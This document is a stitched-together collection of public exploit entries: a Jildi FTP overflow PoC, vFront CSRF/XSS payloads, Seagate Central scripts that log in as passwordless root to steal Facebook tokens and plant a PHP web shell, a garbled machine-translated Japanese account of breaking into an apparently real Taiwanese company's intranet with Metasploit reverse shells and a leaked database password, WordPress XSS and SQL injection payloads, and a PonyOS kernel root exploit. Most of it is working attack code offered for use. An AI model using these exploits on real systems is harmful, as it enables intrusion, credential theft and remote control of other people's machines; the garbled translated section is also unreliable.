Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
#!/usr/bin/python
#Exploit Title:Jildi FTP Client Buffer Overflow Poc
#Version:1.5.2 Build 1138
#Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
#Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
#Tested on:Win7 32bit EN-Ultimate
#Date found: 02.06.2015
#Date published: 02.06.2015
#Author:metacom
'''
===========
Description:
===========
JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
and with lots of useful features. It supports multi-thread file upload or
download , so you can upload or download several files at the same time.
The job manager integrates with the Windows scheduler engine ,this provide
you more freedom and flexibility to upload or download your files.
It can also traces changes within a local directory and apply these
changes to remote ftp server .The user-friendly interface lets your
software distribution, uploading files to a web-server, and providing
archives for various purposes more easily.
============
How to Crash:
============
Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
and paste it in the Option -- Name or Address --and press connect.
===============================================
Crash Analysis using WinDBG: Option --> Address
===============================================
(f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ??
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141
============================================
Crash Analysis using WinDBG: Option --> Name
============================================
(2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
eip=41414141 esp=000311cc ebp=000311ec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???
0:000> !exchain
0012ef40: 41414141
Invalid exception stack at 41414141
'''
filename="Jildi_FTP.txt"
junk1="\x41" * 20000
buffer=junk1
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: CSRF & Persistent XSS
# Google Dork: intitle: CSRF & Persistent XSS
# Date: 2015-06-02
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: www.vfront.org
# Software Link: www.vfront.org
# Version: 0.99.2
# Tested on: windows 7
# Category: webapps
Product:
===================================================================================
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS
Vulnerability Detail(s):
=======================
CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.
Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
Exploit code(s):
===============
CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>
Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
Disclosure Timeline:
===================================
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure
Severity Level:
===================================
High
Description:
==========================================================
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] vfront-0.99.2
Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
id_campo
op
Affected Area(s): [+] Admin & MySQL DB
===============================================================
(hyp3rlinx)
#!/usr/bin/python
# seagate_central_facebook.py
#
# Seagate Central Remote Facebook Access Token Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
# and this exploit takes advantage of two bugs:
#
# 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
# 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
#
# -Example-
#
# > seagate_fb_accounts.py getaccesstoken 1.2.3.4
#
# 'archive_accounts.ser'
#
# a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4:
# "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
# oken";s:186:"CAAxxxxxxxx..."
# ;}}}
#
# Next, try this:
#
# > seagate_fb_accounts.py CAAxxxxxxxx... friends
# server response:
#
# {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
# 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
# : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
# .....
#
# Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
#
# -Fixes-
#
# Seagate scheduled updates to go live on April 28th, 2015.
#
# Tested version: 2014.0410.0026-F
#
import sys
import json
from urllib import request # python3
from ftplib import FTP
fb_url = "https://graph.facebook.com"
fb_filename = "archive_accounts.ser"
def getaccesstoken(host):
try:
ftp = FTP(host)
ftp.login("root")
ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
ftp.close()
except Exception as error:
print("Error: %s" % error)
return
try:
with open(fb_filename, 'r') as file:
data = file.read()
except Exception as error:
print("Error: %s" % error)
return
print("\n'%s'\n\n%s\n\n" % (fb_filename, data))
return
def main():
if(len(sys.argv) < 2):
print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
print("scopes: albums feed friends likes picture posts television")
return
if(sys.argv[1] == "getaccesstoken"):
if(len(sys.argv) == 3):
host = sys.argv[2]
res = getaccesstoken(host)
else:
print("Error: need host to retrieve access token file\n")
return
else:
key = sys.argv[1]
if(len(sys.argv) == 3):
scope = sys.argv[2]
else:
scope = ""
try:
response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()
except Exception as error:
print("Error: %s" % error)
return
data = json.loads(response.decode('utf-8'))
print("server response:\n\n%s\n" % data)
return
if __name__ == "__main__":
main()
#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#
import sys
from ftplib import FTP
port = 21
php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""
php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"
def main():
if(len(sys.argv) < 2):
print("Usage: %s <host>" % sys.argv[0])
return
host = sys.argv[1]
try:
with open(php_shell_filename, 'w') as file:
file.write(php_shell)
except Exception as error:
print("Error: %s" % error);
return
try:
ftp = FTP(host)
ftp.login("root")
ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
ftp.close()
except Exception as error:
print("Error: %s" % error);
return
print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))
return
if __name__ == "__main__":
main()
0x01はじめに
イントラネットの浸透とMSFの使用を学習するために、このテストのターゲットとして特定の台湾技術グループの下でサイトをランダムに見つけました。 2013年9月に、サブドメインのWebシェル許可を取得し、テストを継続しませんでした。当時、Symantecはサーバーにインストールされていませんでしたが、2回目のテストに行ったとき、Symantecがインストールされ、いくつかのセキュリティ強化が実行されたことがわかりました。
0x02ウェブサイトとイントラネットの基本情報コレクション基本情報検出:ターゲットサイト:http://wwww.ttes *****。コムサーバーIP:59。予想外に、彼らはウェブシェル(fckeditor)を非常にスムーズに手に入れました。メインサイトが脆弱性を見つけることができない場合は、「サイドステーション」または「サブドメイン」を開始できます。
この記事では、MSFツールの使用と困難の解決に焦点を当てているため、WebShellを取得する方法についてはあまり説明しません。許可を取得した後に収集されたサーバー情報は次のとおりです。
ポートオープン:25、80、135、445、1025、1521、3389パッチステータス:サーバーシステムには460+パッチ(64ビット)スクリプト検出があります。サーバーはASPおよびASPX拡張名ディスク許可をサポートしています。 ipconfig /allコマンドは、ホスト名がwebsrv4、ip:192.168.0.203、dns:192.168.3.1であることを確認できます。
Windows IP構成ホスト名。 。 websrv4接続固有のDNSサフィックス。 IPアドレス。 。 192.168.0.203サブネットマスク。 。 255.255.255.0デフォルトゲートウェイ。 。 192.168.0.254 DNSサーバー。 。 192.168.3.1 168.95.1.1NETビュー /ドメインコマンドは、2つのドメインとワークグループがあることを確認できます:7PV1V1S、TT、ワークグループ、および生存するホストの対応するIPアドレスがワークグループに示されています。
多くのTTドメインホストがあり、別のテーブルが配置されています。ドメイン制御は次のとおりです。192.168.3.1。ここでは、ワーキンググループと各ドメインの組織構造と、あなた自身の経験に基づいて各ホストが演じる役割を分析できます。
0x03 WebShell Power-Enhanced Defense Software
このホスト制御ホストの現在のシステムは、Windows 2003 x64です。 X64に利用できるExpがあまりないことは知っていますが、試してみる必要があります。結果はすべて失敗します。オラクルは、権力のエスカレーションにさらされたことがなく、私はそれについてあまり知りません。私はそれを脇に置きます。
ASPXとMSSQLが最高のパートナーであることを誰もが知っています。 web.config構成ファイルでデータベース接続情報を見つけます。ここでは、MSSQLデータベースが、サイトライブラリの分離であるIntranet 192.168.0.0.206のホストで実行されていることがわかります。
name='ttes ***** _ enconnectionString1' connectionString='data source=192.168.0.206;初期カタログ=ttes ***** _グローバル;永続セキュリティ情報=true; user id=sa; password=tt@12345' providername='system.data.sqlclient'/next next next next next next noct of to next next nect of to next nex 192.168.0.0.206、XP_CMDSHELLコンポーネントがコマンドを実行して管理者ユーザーを追加してから、PORTFWDコマンドを使用してポート3389ポートを転送します。
注:一部の学生は、マレーシアでポートマッピング機能を直接使用することは大丈夫だと言うかもしれませんが、とにかく成功していません。私の姿勢に何か問題があるのだろうか。まあ、それはそうでなければならない、それはまだ悪いです!
Test $ Administratorユーザーが正常に追加され、次のステップはLCXポート転送ツールを使用することです。誰もが203のホストでアップロードおよび実行されていることを理解する必要がありますが、206のデータベースホストのうち3389です。
c: \ recycler \ lcx.exe-外部ネットワークIP 51 192.168.0.206 3389注:192.168.0.0.203このホストには防御ソフトウェアはありません。 LCX.exeを読み取り可能な書き込み可能なディレクトリに直接アップロードして、正常に実行できます。ただし、記事を書くとき、Symantecがインストールされていることがわかりました。 LCX.EXEおよびさまざまなExpsは、アップロードプロセス中にブロックされています。また、一般的に使用されるVBS、BAT、EXE、アップロード、ダウンロード、修正、展開メソッド、および悪意のある動作として検出される操作を試しました。
Symantecエンドポイント保護プロセス:SMC.EXE、SNAC.EXE、CCSVCHST.EXE、RTVSCAN.EXESYMANTECエンドポイント保護防衛ソフトウェアのリスクログは、デフォルトで14日間のみ保存されます。サーバーを入力した後、それ自体で設定できます。後のテストでは、下の図に示すように、FCKEDITORが共通:1文、ポニー、マレーシアなどなど、FCKEDITORがWebShellをアップロードしたときにも傍受されたことがわかりました。 WAFを通過した馬をより多くの馬にテストして、バイパスできるかどうかを確認できますか?
テスト記録:1。イントラネット環境、サイトライブラリ分離、web.configはデータ(192.168.0.206)SAユーザーを見つけて、管理者ユーザーを正常に追加しました。 2。Web(192.168.0.203)およびデータ(192.168.0.206)はSymantecをインストールしており、LCX.exeおよびその他のツールを使用できません。 3.他の転送ツールをテストした後、それらは傍受されるか使用できず、Reduhは現在の203を転送することができ、速度は非常に遅くなります。 4.MSFPayloadによって生成されたEXEファイルも検出され、サーバーはX64であり、MSFENCODEにはX64エンコーダーがないため、この道路はアクセスできません。
0x04ポート転送用の防御ソフトウェアをバイパス
Google検索を通じて記事でアイデアを入手し、MSFPayLoadを使用してASPXリバウンドスクリプトを生成し、MeterPreterセッションを取得し、PortFWDコマンドを使用してデータベースサーバーの3389ポート192.168.0.206を転送します。
MSFPayload Windows/x64/meterpreter/reverse_tcp lhost=113。***。*。238 lport=12345 r | MSFENCODE -T ASPX -O/MEDIA/SF_SYSTEM LEANDING/test.aspx 
MSFCONSOLELは、リスニング関連のオプションを構成し、新しく生成されたtest.aspxリバウンドスクリプトをWebサイトのWebディレクトリにアップロードし、ブラウザにアクセスしてターゲットホストセッションを取得します。
root@box3:〜#msfconsolemsfの使用exploit/multi/handlermsf exploit(handler)set payload windows/x64/meterpreter/reverse_tcpmsf exploit(handler)set lhost 192.168.1.7msf exploit(handler)set lport 12345msf exploit(handler)exploit(handler)set lport 
次に、データベースサーバー192.168.0.206のPortfWDコマンドをイントラネットで転送し、3389リモート端子に正常に接続できます。関連するコマンドパラメーターは次のとおりです。その時にスクリーンショットを撮るのを忘れていました!
MeterPreter Portfwd Add -L 1234 -P 3389 -R 192.168.0.206 [*]ローカルTCPリレーCreated: 0.0.0.033601234-192.168.0.20633603389
usage: portfwd [-h] [add |削除|リスト|フラッシュ] [args]削除リストの更新パラメーターを追加します
options: -hヘルプバナー。 //help -lローカルホストを選択して聴く(オプション)。 //ローカルIPアドレス-Lローカルポートを選択してリッスンします。 //ローカルポート番号-Rリモートホストを選択して接続します。 //リモートIPアドレス-pリモートポートを選択して接続します。 //リモートポート番号次に、SOCKS4Aプロキシを使用してMSFに接続する場合、イントラネットの3389について説明します。 Socks4Aプロキシを開く前に、最初にMeterPreterセッションを取得し、次にSocks4Aモジュールを直接使用してプロキシを有効にし、デフォルトで実行する必要があります。
MSF Auxiliary(Socks4a)auxiliary/server/socks4amsf Auxiliary(socks4a)set srvhost 127.0.1msf Auxiliary(socks4a)run [*]補助モジュール実行完了completedmsf Auxiliary(socks4a)[*] Proxychains Proxyツールを構成するには、 /etc/proxychains.confファイル1080」の下部に「socks4127.0.0.0.1」を追加する必要があります。SOCKS4AモジュールのSRVHOSTおよびSRVPORTパラメーターが一貫していることを確認する必要があります。
root@box3:〜#VI /etc/proxychains.conf socks4aプロキシを有効にし、プロキシチャインプロキシツールを構成します。現時点では、プロキシProxy Proxy MSF/NMAP/SQLMAP/NESSUS/MYSQL/SQSH/RDESKTOP/FTP/SSHおよびターゲットイントラネットの他のホストを使用して、コマンド末端のターゲットイントラネットの他のホストをスキャンおよびテストすることができます。
root@box3:〜#proxychains msfconsole root@box3:〜#proxychains rdesktop 192.168.0.206注:socks4a proxyが有効になっている場合、正常に使用できない場合、それはファイアウォールの問題である可能性があります。この時点では、SRVHOSTパラメーターを127.0.0.1に設定してみてください。デフォルトは0.0.0.0、ポートは1080です。エージェントの開口部とプロキシツールを混同しないことを忘れないでください。
2014-07-28:もう一度テストした後、元の方法を使用して跳ね返ることができないことがわかりました。その後、Reduh_gui、reverse_tcp 80ポート.およびその他の方法を試しました。データはすべて接続されており、TCP接続ステータスは次のとおりでしたが、接続は許可されていないか、セッションが跳ね返られませんでした。
の最終的なブレークスルーとその後のアイデア:LCX.EXEツールを使用してポート80をローカルに監視し、192.168.0.206データベースサーバーに入った後にSymantec Defenseソフトウェアを無効にし、MSF攻撃ペイロードを実行し、Intranetの他のホストをさらに侵入します。
0x05セグメントCとシステムバージョンのオープンポートを取得
現在のセッションでは、get_local_subnetsスクリプトを使用してローカルサブネットセグメントを取得し、Kaliローカルマシンでルーティングテーブルを確立してクロスルーティングアクセスを実現します。これにより、MSFフレームワークの下のモジュールを使用して、ターゲットイントラネットの他のホストをスキャンおよびテストできます。
MeterPreter Run get_local_subnetslocal subnet: 192.168.0.0/255.255.255.0meterpreter run autoroute -s 192.168.0.0/255.255.255.0 [*] 59。***。**。66 [*] -pオプションを使用して、すべてのアクティブルート//1はセッションのセッションIDです。ルーティングされたときに間違いを犯さないでください! MSFエクスプロイト(ハンドラー)ルート追加192.168.0.0 255.255.255.0 1 //このモジュールは、Cセグメントホスト全体のポート開口部を簡単に検出でき、後の浸透テストで簡単にできるようになります。
ここで、著者は主にこれらの一般的なポートをスキャンします:21/22/445/1433/3306/3389デモンストレーション。他のより一般的なポートは次のとおりです。23/25/80/110/135/1521/8080/14147/43958など。
MSFエクスプロイト(ハンドラー)使用補助/スキャナー/ポートスキャン/TCPMSF補助(TCP)SET RHOSTS 192.168.0.1-254MSF補助(TCP)セットポート21,22,445,1433,3306,3389MSF Auxilary(TCP)セット(TCP)50MSPINIS(TCP)SESWS SWANDS 
が遅すぎる場合は、スレッドを適切に増やすことを選択できます。スキャンプロセス中にしばらく待つ必要があります。終了後、ホストやサービスなどのコマンドパラメーターを使用して、スキャン結果を表示できます。前提は、PostgreSQLデータベースに接続することです。ポートスキャンの結果は、下の図に示すように示されています。
次のモジュールを使用して、生存ホスト、システムバージョン、ソフトウェアバージョン、コンピューター名、MACアドレス、ワーキンググループまたはドメインなどに関する情報を検出することもできます。
補助/スキャナー/ポートスキャン/TCP
補助/スキャナー/ポートスキャン/ACK
補助/スキャナー/ポートスキャン/syn
補助/スキャナー/ftp/ftp_version
補助/スキャナー/ssh/ssh_version
補助/スキャナー/SMB/SMB_Version
補助/スキャナー/DNS/DNS_AMP
補助/スキャナー/http/タイトル
補助/スキャナー/http/http_version
補助/スキャナー/telnet/telnet_version
補助/スキャナー/mysql/mysql_version
補助/スキャナー/postgres/postgres_version
補助/スキャナー/netbios/nbname
補助/スキャナー/netbios/nbname_probe //削除
補助/スキャナー/ディスカバリー/arp_sweep
補助/スキャナー/ディスカバリー/udp_probe
補助/スキャナー/ディスカバリー/udp_sweep
[.切り取り.]
0x06共通サービスブルートフォースモジュール
サードパーティ、SSH/RDP、さまざまなWebサイト/データベース、テキスト、またはテーブルに保存されているユーザーパスワードを含む、より多くのユーザー、パスワード、およびその他の情報を収集するホストに関する情報を収集し、それらを分析して、ルールまたは共通の可能性があるかどうかを確認します。ある場合は、ルールに基づいて効率的な辞書を生成し、次のモジュールをブラストと利用に使用できます。写真は@offsecから来ています!
注:この記事を再編集する際には、一部のモジュールも新しく追加されています。彼らは再編成されているので、なぜそれらのいくつかをしないのですか?強迫性障害が再び行われます!これらも頻繁に使用します。マスターに他の一般的に使用されるモジュールがある場合は、それらを追加することもできます。
auxiliary/scanner/ftp/anonymousauxiliary/scanner/ftp/ftp_loginaauxiliary/scanner/ssh/ssh_loginaauxiliary/scanner/ssh/ssh_login_pubkeyauxiliary/dos/windows/ftp/filezilla_admin_userauxiliary/dos/windows/ftp/filez Illa_server_portpost/windows/ghather/credentials/flashfxppost/windows/ghather/credentiencys/smartftppost/windows/credentiences/wsftp_clientpost/windows/credentiences/filezilla_serverpost/windows/ghatcher/c Redentions/xshell_xftp_passwordpost/multi/graching/filezilla_client_credaauxiliary/scanner/smb/smb_loginaauxiliary/admin/smb/upload_fileexploit/windows/smb/psexecexploit/windows/smb/ms08_067_nepiaiary/scann ER/SMB/SMB_MS17_010EXPLOIT/WINDOWS/SMB/MS17_010_PSEXECAUXILIARY/ADMIN/SMB/MS17_010_COMMANDEXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUEEXPLOIT/WINDOWS/SMB/SMB/SMB/Web/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb/smb /smb/infacket/wmiexecauxiliary/admin/mysql/mysql_enumauxiliary/admin/mysql/mysql_sqlauxiliary/scanner/mysql/mysql_login AAUXILIARY/SCANNER/MYSQL/MYSQL_LOGINAOUXILIARY/SCANNER/MYSQL/MYSQL_HASHDUMPEXPLOIT/WINDOWS/MYSQL/MOFEXPLOIT/MULTI/MYSQL/MYSQL/mysql_udf_payloadauxiliary/admin/mssql/mssql_enumauxiliary/admin/mssql/mssql_execauxiliary/admin/mssql/m ssql_sqlauxiliary/admin/mssql/mssql_escalate_dbownerauxiliary/scanner/mssql/mssql_pingauxiliary/scanner/m SSQL/MSSQL_LOGINAAUXILIARY/SCANNER/MSSQL/MSSQL_HASHDUMPEXPLOIT/MSSQL/MSSQL_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR_CLR/MSSQL_PAYLOADEXPLOIT/WINDOWS/MSSQL/MSSQL_PAYLOADEXPLOIT/MSSQL_PAYLOADEXPLOIT s/ghatcher/enum_termservpost/windows/ghather/credentials/mremoteauxilary/scanner/rdp/ms12_020_checkauxiliary/dos/windows/rdp/ms12_020_maxchannelidsauxiliary/scanner/rdp/cve_2019_0707070708_blueeepexploit/rdpeepexploit/rdpeepexploit
source: https://www.securityfocus.com/bid/53523/info
Newsletter Manager plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script>
###################################################################################################
# Exploit Title: WordPress LeagueManager SQLi
# Version: 3.9.11
# Vendor: https://wordpress.org/plugins/leaguemanager
# Software Link:
https://downloads.wordpress.org/plugin/leaguemanager.3.9.1.1.zip
# Author: javabudd
# Date: 06/01/2015
# Tested on: Linux | Windows
###################################################################################################
Vulnerabilities (2)
==========================
(1) Unauthenticated SQLi [CWE-89]
CODE:
lib/core.php (785)
++++++++++++++++++++++++++
function getMatch() is passed an unsanitized $match_id parameter to the
SQL query
++++++++++++++++++++++++++
POC:
http://localhost/?match=1
SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://localhost/?match=1" --level 5 --risk 3
--dbms mysql
++++++++++++++++++++++++++
---
Parameter: match (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: match=1 AND 3991=3991
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload: match=1 AND (SELECT 8344 FROM(SELECT
COUNT(*),CONCAT(0x7178717671,(SELECT
(ELT(8344=8344,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: match=1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCcI)
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: match=-9496 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717671,0x4945496f7a7062675158,0x717a707a71),NULL--
---
[02:18:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.20, Apache 2.4.10
back-end DBMS: MySQL 5.0
(2) Unauthenticated SQLi [CWE-89]
Code:
lib/core.php (486)
++++++++++++++++++++++++++
function getLeague() is passed an unsanitized $league_id parameter from
the constructor
++++++++++++++++++++++++++
POC:
http://localhost?season=1&league_id=1&match_day=1&team_id=1
SQLMAP
++++++++++++++++++++++++++
python sqlmap.py --url
"http://localhost?season=1&league_id=1&match_day=1&team_id=1" --dbms
mysql --level 5 --risk 3 -p league_id
++++++++++++++++++++++++++
---
Parameter: league_id (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (EXTRACTVALUE)
Payload: season=1&league_id=1' AND
EXTRACTVALUE(4330,CONCAT(0x5c,0x7178717671,(SELECT
(ELT(4330=4330,1))),0x717a707a71)) AND 'SOeQ'='SOeQ&match_day=1&team_id=1
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: season=1&league_id=1' AND
9638=BENCHMARK(5000000,MD5(0x54624c4e)) AND
'GmZI'='GmZI&match_day=1&team_id=1
---
[03:31:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.20, Apache 2.4.10
back-end DBMS: MySQL 5.1
/*
# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A
# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c
*/
/* PonyOS <= 3.0 tty ioctl() root exploit
========================================
PonyOS 0.4.99-mlp had two kernel vulnerabilities
disclosed in April 2013 that could be leveraged
to read/write arbitrary kernel memory. This is
due to tty winsize ioctl() allowing to read/write
arbitrary memory. This exploit patches the setuid
system call to remove a root uid check allowing
any process to obtain root privileges.
John Cartwright found these flaws and others here:
https://www.exploit-db.com/exploits/24933/
Written for educational purposes only. Enjoy!
-- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
int main(){
struct winsize ws;
printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
printf("[-] patched sys_setuid()\n");
__asm("movl $0x18,%eax");
__asm("xorl %ebx,%ebx");
__asm("int $0x7F");
printf("[-] Got root?\n");
system("/bin/sh");
}
source: https://www.securityfocus.com/bid/53522/info
The iFrame Admin Pages plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iFrame Admin Pages 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/iframe-admin-pages/main_page.php POST DATA: url="><script>alert(1)</script>&newiframe=new&servicerequest=new